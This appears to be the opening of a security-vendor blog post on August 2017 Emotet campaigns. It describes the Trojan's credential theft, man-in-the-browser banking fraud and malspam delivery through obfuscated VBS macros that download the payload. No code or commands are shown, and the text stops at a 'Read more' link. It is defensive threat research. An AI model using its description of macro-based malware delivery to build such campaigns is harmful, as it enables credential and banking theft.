A look at recent Emotet Campaigns – August 2017

Introduction Emotet, the credential stealing banking Trojan, was first reported in 2014 when it wreaked havoc in Europe and the United States. The Zscaler Threat Research team has been monitoring the new variant of Emotet since April 2017 and has recently seen a spike in Emotet related spam activity. Emotet is a multi-component malware which specializes in a multitude of nefarious activities, including stealing credentials from browsers and mail clients, banking theft via Man-in-the-Browser attack, email harvesting and propagation through spam emails from infected systems.   Figure 1. Unique new malicious document payloads in last 3 weeks.   Figure 2: Geolocations targeted by recent Emotet campaign Distribution Emotet is commonly distributed through malicious spam email (malspam) campaigns containing a malicious document file attachment or a link to a malicious URL hosting a JavaScript or a document file, which further downloads and installs the Emotet payload. As reported here, in April Emotet was mainly distributed via JavaScript malspam campaigns, whereas the attackers are now leveraging malicious document files with highly obfuscated macro to serve the emotet payload. Obfuscated VBS macro code contains predetermined URLs with code to download and install Emotet payload on the victim machine. As seen in the de-obfuscated VBS macro code (Figure 3), the downloaded binary is stored...
Read more